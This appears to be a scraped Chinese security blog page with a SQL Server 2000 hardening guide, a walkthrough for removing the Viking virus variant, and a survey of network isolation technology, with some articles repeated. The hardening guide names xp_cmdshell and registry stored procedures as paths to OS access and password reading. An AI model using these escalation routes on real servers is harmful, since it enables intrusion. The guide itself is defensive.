微軟的SQL Server是一種廣泛使用的數(shù)據(jù)庫,很多電子商務(wù)網(wǎng)站、企業(yè)內(nèi)部信息化平臺(tái)等都是基于SQL Server上的,但是數(shù)據(jù)庫的安全性還沒有被人們更系統(tǒng)的安全性等同起來,多數(shù)管理員認(rèn)為只要把網(wǎng)絡(luò)和操作系統(tǒng)的安全搞好了,那么所有的應(yīng)用程序也就安全了。大多數(shù)系統(tǒng)管理員對(duì)數(shù)據(jù)庫不熟悉而數(shù)據(jù)庫管理員有對(duì)安全問題關(guān)心太少,而且一些安全公司也忽略數(shù)據(jù)庫安全,這就使數(shù)據(jù)庫的安全問題更加嚴(yán)峻了。數(shù)據(jù)庫系統(tǒng)中存在的安全漏洞和不當(dāng)?shù)呐渲猛ǔ?huì)造成嚴(yán)重的后果,而且都難以發(fā)現(xiàn)。數(shù)據(jù)庫應(yīng)用程序通常同操作系統(tǒng)的最高管理員密切相關(guān)。廣泛SQL Server數(shù)據(jù)庫又是屬于“端口”型的數(shù)據(jù)庫,這就表示任何人都能夠用分析工具試圖連接到數(shù)據(jù)庫上,從而繞過操作系統(tǒng)的安全機(jī)制,進(jìn)而闖入系統(tǒng)、破壞和竊取數(shù)據(jù)資料,甚至破壞整個(gè)系統(tǒng)。
這里,我們主要談?wù)撚嘘P(guān)SQL Server2000數(shù)據(jù)庫的安全配置以及一些相關(guān)的安全和使用上的問題。
在進(jìn)行SQL Server 2000數(shù)據(jù)庫的安全配置之前,首先你必須對(duì)操作系統(tǒng)進(jìn)行安全配置,保證你的操作系統(tǒng)處于安全狀態(tài)。然后對(duì)你要使用的操作數(shù)據(jù)庫軟件(程序)進(jìn)行必要的安全審核,比如對(duì)ASP、PHP等腳本,這是很多基于數(shù)據(jù)庫的WEB應(yīng)用常出現(xiàn)的安全隱患,對(duì)于腳本主要是一個(gè)過濾問題,需要過濾一些類似 , ‘ ; @ / 等字符,防止破壞者構(gòu)造惡意的SQL語句。接著,安裝SQL Server2000后請(qǐng)打上補(bǔ)丁sp1以及最新的sp2。
下載地址是:http://www.microsoft.com/sql/downloads/2000/sp1.asp 和 http://www.microsoft.com/sql/downloads/2000/sp2.asp
在做完上面三步基礎(chǔ)之后,我們?cè)賮碛懻揝QL Server的安全配置。
1、使用安全的密碼策略
我們把密碼策略擺在所有安全配置的第一步,請(qǐng)注意,很多數(shù)據(jù)庫帳號(hào)的密碼過于簡單,這跟系統(tǒng)密碼過于簡單是一個(gè)道理。對(duì)于sa更應(yīng)該注意,同時(shí)不要讓sa帳號(hào)的密碼寫于應(yīng)用程序或者腳本中。健壯的密碼是安全的第一步!
SQL Server2000安裝的時(shí)候,如果是使用混合模式,那么就需要輸入sa的密碼,除非你確認(rèn)必須使用空密碼。這比以前的版本有所改進(jìn)。
同時(shí)養(yǎng)成定期修改密碼的好習(xí)慣。數(shù)據(jù)庫管理員應(yīng)該定期查看是否有不符合密碼要求的帳號(hào)。比如使用下面的SQL語句:
Use master
Select name,Password from syslogins where password is null
2、使用安全的帳號(hào)策略
由于SQL Server不能更改sa用戶名稱,也不能刪除這個(gè)超級(jí)用戶,所以,我們必須對(duì)這個(gè)帳號(hào)進(jìn)行最強(qiáng)的保護(hù),當(dāng)然,包括使用一個(gè)非常強(qiáng)壯的密碼,最好不要在數(shù)據(jù)庫應(yīng)用中使用sa帳號(hào),只有當(dāng)沒有其它方法登錄到 SQL Server 實(shí)例(例如,當(dāng)其它系統(tǒng)管理員不可用或忘記了密碼)時(shí)才使用 sa。建議數(shù)據(jù)庫管理員新建立一個(gè)擁有與sa一樣權(quán)限的超級(jí)用戶來管理數(shù)據(jù)庫。安全的帳號(hào)策略還包括不要讓管理員權(quán)限的帳號(hào)泛濫。
SQL Server的認(rèn)證模式有Windows身份認(rèn)證和混合身份認(rèn)證兩種。如果數(shù)據(jù)庫管理員不希望操作系統(tǒng)管理員來通過操作系統(tǒng)登陸來接觸數(shù)據(jù)庫的話,可以在帳號(hào)管理中把系統(tǒng)帳號(hào)“BUILTINAdministrators”刪除。不過這樣做的結(jié)果是一旦sa帳號(hào)忘記密碼的話,就沒有辦法來恢復(fù)了。
很多主機(jī)使用數(shù)據(jù)庫應(yīng)用只是用來做查詢、修改等簡單功能的,請(qǐng)根據(jù)實(shí)際需要分配帳號(hào),并賦予僅僅能夠滿足應(yīng)用要求和需要的權(quán)限。比如,只要查詢功能的,那么就使用一個(gè)簡單的public帳號(hào)能夠select就可以了。
3、加強(qiáng)數(shù)據(jù)庫日志的記錄
審核數(shù)據(jù)庫登錄事件的“失敗和成功”,在實(shí)例屬性中選擇“安全性”,將其中的審核級(jí)別選定為全部,這樣在數(shù)據(jù)庫系統(tǒng)和操作系統(tǒng)日志里面,就詳細(xì)記錄了所有帳號(hào)的登錄事件。
請(qǐng)定期查看SQL Server日志檢查是否有可疑的登錄事件發(fā)生,或者使用DOS命令。
findstr /C:"登錄" d:Microsoft SQL ServerMSSQLLOG*.*
4、管理擴(kuò)展存儲(chǔ)過程
對(duì)存儲(chǔ)過程進(jìn)行大手術(shù),并且對(duì)帳號(hào)調(diào)用擴(kuò)展存儲(chǔ)過程的權(quán)限要慎重。其實(shí)在多數(shù)應(yīng)用中根本用不到多少系統(tǒng)的存儲(chǔ)過程,而SQL Server的這么多系統(tǒng)存儲(chǔ)過程只是用來適應(yīng)廣大用戶需求的,所以請(qǐng)刪除不必要的存儲(chǔ)過程,因?yàn)橛行┫到y(tǒng)的存儲(chǔ)過程能很容易地被人利用起來提升權(quán)限或進(jìn)行破壞。
如果你不需要擴(kuò)展存儲(chǔ)過程xp_cmdshell請(qǐng)把它去掉。使用這個(gè)SQL語句:
use master
sp_dropextendedproc 'xp_cmdshell'
xp_cmdshell是進(jìn)入操作系統(tǒng)的最佳捷徑,是數(shù)據(jù)庫留給操作系統(tǒng)的一個(gè)大后門。如果你需要這個(gè)存儲(chǔ)過程,請(qǐng)用這個(gè)語句也可以恢復(fù)過來。
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
如果你不需要請(qǐng)丟棄OLE自動(dòng)存儲(chǔ)過程(會(huì)造成管理器中的某些特征不能使用),這些過程包括如下:
Sp_OACreate Sp_OADestroy Sp_OAGetErrorInfo Sp_OAGetProperty
Sp_OAMethod Sp_OASetProperty Sp_OAStop
去掉不需要的注冊(cè)表訪問的存儲(chǔ)過程,注冊(cè)表存儲(chǔ)過程甚至能夠讀出操作系統(tǒng)管理員的密碼來,如下:
Xp_regaddmultistring Xp_regdeletekey Xp_regdeletevalue Xp_regenumvalues
Xp_regread Xp_regremovemultistring Xp_regwrite
還有一些其他的擴(kuò)展存儲(chǔ)過程,你也最好檢查檢查。
在處理存儲(chǔ)過程的時(shí)候,請(qǐng)確認(rèn)一下,避免造成對(duì)數(shù)據(jù)庫或應(yīng)用程序的傷害。
5、使用協(xié)議加密
SQL Server 2000使用的Tabular Data Stream協(xié)議來進(jìn)行網(wǎng)絡(luò)數(shù)據(jù)交換,如果不加密的話,所有的網(wǎng)絡(luò)傳輸都是明文的,包括密碼、數(shù)據(jù)庫內(nèi)容等等,這是一個(gè)很大的安全威脅。能被人在網(wǎng)絡(luò)中截獲到他們需要的東西,包括數(shù)據(jù)庫帳號(hào)和密碼。所以,在條件容許情況下,最好使用SSL來加密協(xié)議,當(dāng)然,你需要一個(gè)證書來支持。
6、不要讓人隨便探測到你的TCP/IP端口
默認(rèn)情況下,SQL Server使用1433端口監(jiān)聽,很多人都說SQL Server配置的時(shí)候要把這個(gè)端口改變,這樣別人就不能很容易地知道使用的什么端口了。可惜,通過微軟未公開的1434端口的UDP探測可以很容易知道SQL Server使用的什么TCP/IP端口了。
不過微軟還是考慮到了這個(gè)問題,畢竟公開而且開放的端口會(huì)引起不必要的麻煩。在實(shí)例屬性中選擇TCP/IP協(xié)議的屬性。選擇隱藏 SQL Server 實(shí)例。如果隱藏了 SQL Server 實(shí)例,則將禁止對(duì)試圖枚舉網(wǎng)絡(luò)上現(xiàn)有的 SQL Server 實(shí)例的客戶端所發(fā)出的廣播作出響應(yīng)。這樣,別人就不能用1434來探測你的TCP/IP端口了(除非用Port Scan)。
7、修改TCP/IP使用的端口
請(qǐng)?jiān)谏弦徊脚渲玫幕A(chǔ)上,更改原默認(rèn)的1433端口。在實(shí)例屬性中選擇網(wǎng)絡(luò)配置中的TCP/IP協(xié)議的屬性,將TCP/IP使用的默認(rèn)端口變?yōu)槠渌丝凇?
8、拒絕來自1434端口的探測
由于1434端口探測沒有限制,能夠被別人探測到一些數(shù)據(jù)庫信息,而且還可能遭到DOS攻擊讓數(shù)據(jù)庫服務(wù)器的CPU負(fù)荷增大,所以對(duì)Windows 2000操作系統(tǒng)來說,在IPSec過濾拒絕掉1434端口的UDP通訊,可以盡可能地隱藏你的SQL Server。
9、對(duì)網(wǎng)絡(luò)連接進(jìn)行IP限制
SQL Server 2000數(shù)據(jù)庫系統(tǒng)本身沒有提供網(wǎng)絡(luò)連接的安全解決辦法,但是Windows 2000提供了這樣的安全機(jī)制。使用操作系統(tǒng)自己的IPSec可以實(shí)現(xiàn)IP數(shù)據(jù)包的安全性。請(qǐng)對(duì)IP連接進(jìn)行限制,只保證自己的IP能夠訪問,也拒絕其他IP進(jìn)行的端口連接,把來自網(wǎng)絡(luò)上的安全威脅進(jìn)行有效的控制。
關(guān)于IPSec的使用請(qǐng)參看:http://www.microsoft.com/china/technet/security/ipsecloc.asp
上面主要介紹的一些SQL Server的安全配置,經(jīng)過以上的配置,可以讓SQL Server本身具備足夠的安全防范能力。當(dāng)然,更主要的還是要加強(qiáng)內(nèi)部的安全控制和管理員的安全培訓(xùn),而且安全性問題是一個(gè)長期的解決過程,還需要以后進(jìn)行更多的安全維護(hù)。
殺死威金變種病毒,挽救硬盤數(shù)據(jù)
[ 2007-03-25 03:59:17 | 作者: sun ]
近來,威金變種病毒肆虐,不少人中招后被迫格式化所有分區(qū),苦心保存的數(shù)據(jù)毀于一旦。
中了這種病毒的特征是:系統(tǒng)響應(yīng)緩慢,玩網(wǎng)絡(luò)游戲時(shí)會(huì)自動(dòng)退出,硬盤里的EXE文件圖標(biāo)會(huì)變“花”;到dos下用ghost恢復(fù)系統(tǒng)失敗;如果不全盤格式化,重裝系統(tǒng)也不能解決問題。
今天有幸遇到感染此種病毒的電腦,在機(jī)主幾乎絕望的情況下清除了病毒,挽救了他多年積累的數(shù)據(jù)。
現(xiàn)在,偶把此次殺毒的過程貼上來,供遇到類似問題的網(wǎng)友參考。
清除病毒的步驟如下:
一、結(jié)束病毒進(jìn)程,刪除病毒的啟動(dòng)項(xiàng)。
1、開機(jī)按F8鍵,進(jìn)安全模式;
2、按Ctrl+Alt+Del打開“任務(wù)管理器”,結(jié)束Logo1和Rundll32進(jìn)程;
3、我的電腦→屬性→系統(tǒng)還原,勾選“在所有驅(qū)動(dòng)器上關(guān)閉系統(tǒng)還原”,“確定”;(如果原來已經(jīng)關(guān)閉了系統(tǒng)還原,這一步可略)
4、右擊“我的電腦”→資源管理器→工具→文件夾選項(xiàng)→查看,去掉“隱藏受保護(hù)的操作系統(tǒng)(推薦)”前面的√,選“顯示所有文件和文件夾”;
在左邊“文件夾”框中依次點(diǎn)Documents and Settings→用戶帳戶名→Local Settings→Temp;
用鼠標(biāo)點(diǎn)一下右邊的任何地方,再點(diǎn)“編輯”→全部選定,然后按Shift+Delete來刪除TEMP文件夾下的所有文件。
5、開始→運(yùn)行,鍵入msconfig,打開“系統(tǒng)配置實(shí)用程序”界面,點(diǎn)“啟動(dòng)”,找出可疑的啟動(dòng)項(xiàng),如“命令”項(xiàng)有windows\rundll32.exe、windows\logo1.exe,windows\down\rundll32.exe等的啟動(dòng)項(xiàng);再回到第4步里的“資源管理器”界面,找到rundll32.exe、logo1.exe并刪除;
6、再運(yùn)行regedit打開注冊(cè)表,編輯→查找,鍵入run,并勾選“全字匹配”,然后開始查找,如果看到run項(xiàng)中有可疑的、指向上述病毒的鍵值,則刪除該鍵(注意:不是刪除run項(xiàng)),按F3繼續(xù)查找,刪除與病毒有關(guān)的鍵,直至查找完畢;
7、點(diǎn)“開始”→搜索→文件或文件夾→所有文件和文件夾,最大化窗口,文件名欄填“_desktop.ini” , “更多高級(jí)選項(xiàng)”中勾選“搜索系統(tǒng)文件夾”、“搜索隱藏的文件和文件夾”、“搜索子文件夾” ,然后點(diǎn)“搜索”,搜索完后,單擊“編輯”→全部選定,再按Shift+Delete刪除所有找到的“_desktop.ini文件。
經(jīng)過上述處理后,即使重啟系統(tǒng),病毒一般不會(huì)隨系統(tǒng)而啟動(dòng)了。為了保險(xiǎn)起見,可以在第5步中點(diǎn)“服務(wù)”,勾選“隱藏所有Microsoft服務(wù)”,把所有項(xiàng)目前面的√去掉(如果是殺毒軟件的,到系統(tǒng)正常后再恢復(fù)就可以了);
二、下載專殺工具,清除病毒,挽救硬盤數(shù)據(jù)
重啟系統(tǒng),再次按F8鍵,選“帶網(wǎng)絡(luò)的安全模式”(正常啟動(dòng)也可以,但為保險(xiǎn)起見,還是進(jìn)入安全模式),打開IE,登錄“江民(www.jiangmin.com)網(wǎng)站”或“瑞星(www.rising.com.cn)網(wǎng)站”,下載威金專殺工具,保存到“桌面”或其它地方,下載完后,運(yùn)行它,便進(jìn)入了清除病毒的過程。
過一段時(shí)間后,病毒就清除完畢。再重啟系統(tǒng),系統(tǒng)就正常了,所有EXE文件也可以用了。
再強(qiáng)調(diào)一下,上述是有關(guān)“威金變種病毒”的查殺方法,很多人可能同時(shí)也中了其它病毒,因此,建議在處理“威金變種病毒”后,安裝殺毒軟件,升級(jí)病毒庫,進(jìn)行全盤殺毒。
中了這種病毒的特征是:系統(tǒng)響應(yīng)緩慢,玩網(wǎng)絡(luò)游戲時(shí)會(huì)自動(dòng)退出,硬盤里的EXE文件圖標(biāo)會(huì)變“花”;到dos下用ghost恢復(fù)系統(tǒng)失敗;如果不全盤格式化,重裝系統(tǒng)也不能解決問題。
今天有幸遇到感染此種病毒的電腦,在機(jī)主幾乎絕望的情況下清除了病毒,挽救了他多年積累的數(shù)據(jù)。
現(xiàn)在,偶把此次殺毒的過程貼上來,供遇到類似問題的網(wǎng)友參考。
清除病毒的步驟如下:
一、結(jié)束病毒進(jìn)程,刪除病毒的啟動(dòng)項(xiàng)。
1、開機(jī)按F8鍵,進(jìn)安全模式;
2、按Ctrl+Alt+Del打開“任務(wù)管理器”,結(jié)束Logo1和Rundll32進(jìn)程;
3、我的電腦→屬性→系統(tǒng)還原,勾選“在所有驅(qū)動(dòng)器上關(guān)閉系統(tǒng)還原”,“確定”;(如果原來已經(jīng)關(guān)閉了系統(tǒng)還原,這一步可略)
4、右擊“我的電腦”→資源管理器→工具→文件夾選項(xiàng)→查看,去掉“隱藏受保護(hù)的操作系統(tǒng)(推薦)”前面的√,選“顯示所有文件和文件夾”;
在左邊“文件夾”框中依次點(diǎn)Documents and Settings→用戶帳戶名→Local Settings→Temp;
用鼠標(biāo)點(diǎn)一下右邊的任何地方,再點(diǎn)“編輯”→全部選定,然后按Shift+Delete來刪除TEMP文件夾下的所有文件。
5、開始→運(yùn)行,鍵入msconfig,打開“系統(tǒng)配置實(shí)用程序”界面,點(diǎn)“啟動(dòng)”,找出可疑的啟動(dòng)項(xiàng),如“命令”項(xiàng)有windows\rundll32.exe、windows\logo1.exe,windows\down\rundll32.exe等的啟動(dòng)項(xiàng);再回到第4步里的“資源管理器”界面,找到rundll32.exe、logo1.exe并刪除;
6、再運(yùn)行regedit打開注冊(cè)表,編輯→查找,鍵入run,并勾選“全字匹配”,然后開始查找,如果看到run項(xiàng)中有可疑的、指向上述病毒的鍵值,則刪除該鍵(注意:不是刪除run項(xiàng)),按F3繼續(xù)查找,刪除與病毒有關(guān)的鍵,直至查找完畢;
7、點(diǎn)“開始”→搜索→文件或文件夾→所有文件和文件夾,最大化窗口,文件名欄填“_desktop.ini” , “更多高級(jí)選項(xiàng)”中勾選“搜索系統(tǒng)文件夾”、“搜索隱藏的文件和文件夾”、“搜索子文件夾” ,然后點(diǎn)“搜索”,搜索完后,單擊“編輯”→全部選定,再按Shift+Delete刪除所有找到的“_desktop.ini文件。
經(jīng)過上述處理后,即使重啟系統(tǒng),病毒一般不會(huì)隨系統(tǒng)而啟動(dòng)了。為了保險(xiǎn)起見,可以在第5步中點(diǎn)“服務(wù)”,勾選“隱藏所有Microsoft服務(wù)”,把所有項(xiàng)目前面的√去掉(如果是殺毒軟件的,到系統(tǒng)正常后再恢復(fù)就可以了);
二、下載專殺工具,清除病毒,挽救硬盤數(shù)據(jù)
重啟系統(tǒng),再次按F8鍵,選“帶網(wǎng)絡(luò)的安全模式”(正常啟動(dòng)也可以,但為保險(xiǎn)起見,還是進(jìn)入安全模式),打開IE,登錄“江民(www.jiangmin.com)網(wǎng)站”或“瑞星(www.rising.com.cn)網(wǎng)站”,下載威金專殺工具,保存到“桌面”或其它地方,下載完后,運(yùn)行它,便進(jìn)入了清除病毒的過程。
過一段時(shí)間后,病毒就清除完畢。再重啟系統(tǒng),系統(tǒng)就正常了,所有EXE文件也可以用了。
再強(qiáng)調(diào)一下,上述是有關(guān)“威金變種病毒”的查殺方法,很多人可能同時(shí)也中了其它病毒,因此,建議在處理“威金變種病毒”后,安裝殺毒軟件,升級(jí)病毒庫,進(jìn)行全盤殺毒。
網(wǎng)絡(luò)隔離技術(shù)安全要素 發(fā)展方向概述
[ 2007-03-25 03:59:01 | 作者: sun ]
面對(duì)新型網(wǎng)絡(luò)攻擊手段的出現(xiàn)和高安全度網(wǎng)絡(luò)對(duì)安全的特殊需求,全新安全防護(hù)防范理念的網(wǎng)絡(luò)安全技術(shù)——“網(wǎng)絡(luò)隔離技術(shù)”應(yīng)運(yùn)而生。
網(wǎng)絡(luò)隔離技術(shù)的目標(biāo)是確保把有害的攻擊隔離,在可信網(wǎng)絡(luò)之外和保證可信網(wǎng)絡(luò)內(nèi)部信息不外泄的前提下,完成網(wǎng)間數(shù)據(jù)的安全交換。網(wǎng)絡(luò)隔離技術(shù)是在原有安全技術(shù)的基礎(chǔ)上發(fā)展起來的,它彌補(bǔ)了原有安全技術(shù)的不足,突出了自己的優(yōu)勢。
隔離技術(shù)的發(fā)展歷程
網(wǎng)絡(luò)隔離,英文名為Network Isolation,主要是指把兩個(gè)或兩個(gè)以上可路由的網(wǎng)絡(luò)(如:TCP/IP)通過不可路由的協(xié)議(如:IPX/SPX、NetBEUI等)進(jìn)行數(shù)據(jù)交換而達(dá)到隔離目的。由于其原理主要是采用了不同的協(xié)議,所以通常也叫協(xié)議隔離(Protocol Isolation)。1997年,信息安全專家Mark Joseph Edwards在他編寫的《Understanding Network Security》一書中,他就對(duì)協(xié)議隔離進(jìn)行了歸類。在書中他明確地指出了協(xié)議隔離和防火墻不屬于同類產(chǎn)品。
隔離概念是在為了保護(hù)高安全度網(wǎng)絡(luò)環(huán)境的情況下產(chǎn)生的;隔離產(chǎn)品的大量出現(xiàn),也是經(jīng)歷了五代隔離技術(shù)不斷的實(shí)踐和理論相結(jié)合后得來的。
第一代隔離技術(shù)——完全的隔離。此方法使得網(wǎng)絡(luò)處于信息孤島狀態(tài),做到了完全的物理隔離,需要至少兩套網(wǎng)絡(luò)和系統(tǒng),更重要的是信息交流的不便和成本的提高,這樣給維護(hù)和使用帶來了極大的不便。
第二代隔離技術(shù)——硬件卡隔離。在客戶端增加一塊硬件卡,客戶端硬盤或其他存儲(chǔ)設(shè)備首先連接到該卡,然后再轉(zhuǎn)接到主板上,通過該卡能控制客戶端硬盤或其他存儲(chǔ)設(shè)備。而在選擇不同的硬盤時(shí),同時(shí)選擇了該卡上不同的網(wǎng)絡(luò)接口,連接到不同的網(wǎng)絡(luò)。但是,這種隔離產(chǎn)品有的仍然需要網(wǎng)絡(luò)布線為雙網(wǎng)線結(jié)構(gòu),產(chǎn)品存在著較大的安全隱患。
第三代隔離技術(shù)—數(shù)據(jù)轉(zhuǎn)播隔離。利用轉(zhuǎn)播系統(tǒng)分時(shí)復(fù)制文件的途徑來實(shí)現(xiàn)隔離,切換時(shí)間非常之久,甚至需要手工完成,不僅明顯地減緩了訪問速度,更不支持常見的網(wǎng)絡(luò)應(yīng)用,失去了網(wǎng)絡(luò)存在的意義。
第四代隔離技術(shù)—空氣開關(guān)隔離。它是通過使用單刀雙擲開關(guān),使得內(nèi)外部網(wǎng)絡(luò)分時(shí)訪問臨時(shí)緩存器來完成數(shù)據(jù)交換的,但在安全和性能上存在有許多問題。
第五代隔離技術(shù)—安全通道隔離。此技術(shù)通過專用通信硬件和專有安全協(xié)議等安全機(jī)制,來實(shí)現(xiàn)內(nèi)外部網(wǎng)絡(luò)的隔離和數(shù)據(jù)交換,不僅解決了以前隔離技術(shù)存在的問題,并有效地把內(nèi)外部網(wǎng)絡(luò)隔離開來,而且高效地實(shí)現(xiàn)了內(nèi)外網(wǎng)數(shù)據(jù)的安全交換,透明支持多種網(wǎng)絡(luò)應(yīng)用,成為當(dāng)前隔離技術(shù)的發(fā)展方向。
隔離技術(shù)需具備的安全要點(diǎn)
要具有高度的自身安全性 隔離產(chǎn)品要保證自身具有高度的安全性,至少在理論和實(shí)踐上要比防火墻高一個(gè)安全級(jí)別。從技術(shù)實(shí)現(xiàn)上,除了和防火墻一樣對(duì)操作系統(tǒng)進(jìn)行加固優(yōu)化或采用安全操作系統(tǒng)外,關(guān)鍵在于要把外網(wǎng)接口和內(nèi)網(wǎng)接口從一套操作系統(tǒng)中分離出來。也就是說至少要由兩套主機(jī)系統(tǒng)組成,一套控制外網(wǎng)接口,另一套控制內(nèi)網(wǎng)接口,然后在兩套主機(jī)系統(tǒng)之間通過不可路由的協(xié)議進(jìn)行數(shù)據(jù)交換,如此,既便黑客攻破了外網(wǎng)系統(tǒng),仍然無法控制內(nèi)網(wǎng)系統(tǒng),就達(dá)到了更高的安全級(jí)別。
要確保網(wǎng)絡(luò)之間是隔離的 保證網(wǎng)間隔離的關(guān)鍵是網(wǎng)絡(luò)包不可路由到對(duì)方網(wǎng)絡(luò),無論中間采用了什么轉(zhuǎn)換方法,只要最終使得一方的網(wǎng)絡(luò)包能夠進(jìn)入到對(duì)方的網(wǎng)絡(luò)中,都無法稱之為隔離,即達(dá)不到隔離的效果。顯然,只是對(duì)網(wǎng)間的包進(jìn)行轉(zhuǎn)發(fā),并且允許建立端到端連接的防火墻,是沒有任何隔離效果的。此外,那些只是把網(wǎng)絡(luò)包轉(zhuǎn)換為文本,交換到對(duì)方網(wǎng)絡(luò)后,再把文本轉(zhuǎn)換為網(wǎng)絡(luò)包的產(chǎn)品也是沒有做到隔離的。
要保證網(wǎng)間交換的只是應(yīng)用數(shù)據(jù) 既然要達(dá)到網(wǎng)絡(luò)隔離,就必須做到徹底防范基于網(wǎng)絡(luò)協(xié)議的攻擊,即不能夠讓網(wǎng)絡(luò)層的攻擊包到達(dá)要保護(hù)的網(wǎng)絡(luò)中,所以就必須進(jìn)行協(xié)議分析,完成應(yīng)用層數(shù)據(jù)的提取,然后進(jìn)行數(shù)據(jù)交換,這樣就把諸如TearDrop、Land、Smurf和SYN Flood等網(wǎng)絡(luò)攻擊包,徹底地阻擋在了可信網(wǎng)絡(luò)之外,從而明顯地增強(qiáng)了可信網(wǎng)絡(luò)的安全性。
要對(duì)網(wǎng)間的訪問進(jìn)行嚴(yán)格的控制和檢查 作為一套適用于高安全度網(wǎng)絡(luò)的安全設(shè)備,要確保每次數(shù)據(jù)交換都是可信的和可控制的,嚴(yán)格防止非法通道的出現(xiàn),以確保信息數(shù)據(jù)的安全和訪問的可審計(jì)性。所以必須施加以一定的技術(shù),保證每一次數(shù)據(jù)交換過程都是可信的,并且內(nèi)容是可控制的,可采用基于會(huì)話的認(rèn)證技術(shù)和內(nèi)容分析與控制引擎等技術(shù)來實(shí)現(xiàn)。
要在堅(jiān)持隔離的前提下保證網(wǎng)絡(luò)暢通和應(yīng)用透明 隔離產(chǎn)品會(huì)部署在多種多樣的復(fù)雜網(wǎng)絡(luò)環(huán)境中,并且往往是數(shù)據(jù)交換的關(guān)鍵點(diǎn),因此,產(chǎn)品要具有很高的處理性能,不能夠成為網(wǎng)絡(luò)交換的瓶頸,要有很好的穩(wěn)定性;不能夠出現(xiàn)時(shí)斷時(shí)續(xù)的情況,要有很強(qiáng)的適應(yīng)性,能夠透明接入網(wǎng)絡(luò),并且透明支持多種應(yīng)用。
網(wǎng)絡(luò)隔離的關(guān)鍵點(diǎn)
網(wǎng)絡(luò)隔離的關(guān)鍵是在于系統(tǒng)對(duì)通信數(shù)據(jù)的控制,即通過不可路由的協(xié)議來完成網(wǎng)間的數(shù)據(jù)交換。由于通信硬件設(shè)備工作在網(wǎng)絡(luò)七層的最下層,并不能感知到交換數(shù)據(jù)的機(jī)密性、完整性、可用性、可控性、抗抵賴等安全要素,所以這要通過訪問控制、身份認(rèn)證、加密簽名等安全機(jī)制來實(shí)現(xiàn),而這些機(jī)制的實(shí)現(xiàn)都是通過軟件來實(shí)現(xiàn)的。
因此,隔離的關(guān)鍵點(diǎn)就成了要盡量提高網(wǎng)間數(shù)據(jù)交換的速度,并且對(duì)應(yīng)用能夠透明支持,以適應(yīng)復(fù)雜和高帶寬需求的網(wǎng)間數(shù)據(jù)交換。而由于設(shè)計(jì)原理問題使得第三代和第四代隔離產(chǎn)品在這方面很難突破,既便有所改進(jìn)也必須付出巨大的成本,和“適度安全”理念相悖。
隔離技術(shù)的未來發(fā)展方向
第五代隔離技術(shù)的出現(xiàn),是在對(duì)市場上網(wǎng)絡(luò)隔離產(chǎn)品和高安全度網(wǎng)需求的詳細(xì)分析情況下產(chǎn)生的,它不僅很好地解決了第三代和第四代很難解決的速度瓶頸問題,并且先進(jìn)的安全理念和設(shè)計(jì)思路,明顯地提升了產(chǎn)品的安全功能,是一種創(chuàng)新的隔離防護(hù)手段。
隔離原理 第五代隔離技術(shù)的實(shí)現(xiàn)原理是通過專用通信設(shè)備、專有安全協(xié)議和加密驗(yàn)證機(jī)制及應(yīng)用層數(shù)據(jù)提取和鑒別認(rèn)證技術(shù),進(jìn)行不同安全級(jí)別網(wǎng)絡(luò)之間的數(shù)據(jù)交換,徹底阻斷了網(wǎng)絡(luò)間的直接TCP/IP連接,同時(shí)對(duì)網(wǎng)間通信的雙方、內(nèi)容、過程施以嚴(yán)格的身份認(rèn)證、內(nèi)容過濾、安全審計(jì)等多種安全防護(hù)機(jī)制,從而保證了網(wǎng)間數(shù)據(jù)交換的安全、可控,杜絕了由于操作系統(tǒng)和網(wǎng)絡(luò)協(xié)議自身漏洞帶來的安全風(fēng)險(xiǎn)。
網(wǎng)絡(luò)隔離技術(shù)的目標(biāo)是確保把有害的攻擊隔離,在可信網(wǎng)絡(luò)之外和保證可信網(wǎng)絡(luò)內(nèi)部信息不外泄的前提下,完成網(wǎng)間數(shù)據(jù)的安全交換。網(wǎng)絡(luò)隔離技術(shù)是在原有安全技術(shù)的基礎(chǔ)上發(fā)展起來的,它彌補(bǔ)了原有安全技術(shù)的不足,突出了自己的優(yōu)勢。
隔離技術(shù)的發(fā)展歷程
網(wǎng)絡(luò)隔離,英文名為Network Isolation,主要是指把兩個(gè)或兩個(gè)以上可路由的網(wǎng)絡(luò)(如:TCP/IP)通過不可路由的協(xié)議(如:IPX/SPX、NetBEUI等)進(jìn)行數(shù)據(jù)交換而達(dá)到隔離目的。由于其原理主要是采用了不同的協(xié)議,所以通常也叫協(xié)議隔離(Protocol Isolation)。1997年,信息安全專家Mark Joseph Edwards在他編寫的《Understanding Network Security》一書中,他就對(duì)協(xié)議隔離進(jìn)行了歸類。在書中他明確地指出了協(xié)議隔離和防火墻不屬于同類產(chǎn)品。
隔離概念是在為了保護(hù)高安全度網(wǎng)絡(luò)環(huán)境的情況下產(chǎn)生的;隔離產(chǎn)品的大量出現(xiàn),也是經(jīng)歷了五代隔離技術(shù)不斷的實(shí)踐和理論相結(jié)合后得來的。
第一代隔離技術(shù)——完全的隔離。此方法使得網(wǎng)絡(luò)處于信息孤島狀態(tài),做到了完全的物理隔離,需要至少兩套網(wǎng)絡(luò)和系統(tǒng),更重要的是信息交流的不便和成本的提高,這樣給維護(hù)和使用帶來了極大的不便。
第二代隔離技術(shù)——硬件卡隔離。在客戶端增加一塊硬件卡,客戶端硬盤或其他存儲(chǔ)設(shè)備首先連接到該卡,然后再轉(zhuǎn)接到主板上,通過該卡能控制客戶端硬盤或其他存儲(chǔ)設(shè)備。而在選擇不同的硬盤時(shí),同時(shí)選擇了該卡上不同的網(wǎng)絡(luò)接口,連接到不同的網(wǎng)絡(luò)。但是,這種隔離產(chǎn)品有的仍然需要網(wǎng)絡(luò)布線為雙網(wǎng)線結(jié)構(gòu),產(chǎn)品存在著較大的安全隱患。
第三代隔離技術(shù)—數(shù)據(jù)轉(zhuǎn)播隔離。利用轉(zhuǎn)播系統(tǒng)分時(shí)復(fù)制文件的途徑來實(shí)現(xiàn)隔離,切換時(shí)間非常之久,甚至需要手工完成,不僅明顯地減緩了訪問速度,更不支持常見的網(wǎng)絡(luò)應(yīng)用,失去了網(wǎng)絡(luò)存在的意義。
第四代隔離技術(shù)—空氣開關(guān)隔離。它是通過使用單刀雙擲開關(guān),使得內(nèi)外部網(wǎng)絡(luò)分時(shí)訪問臨時(shí)緩存器來完成數(shù)據(jù)交換的,但在安全和性能上存在有許多問題。
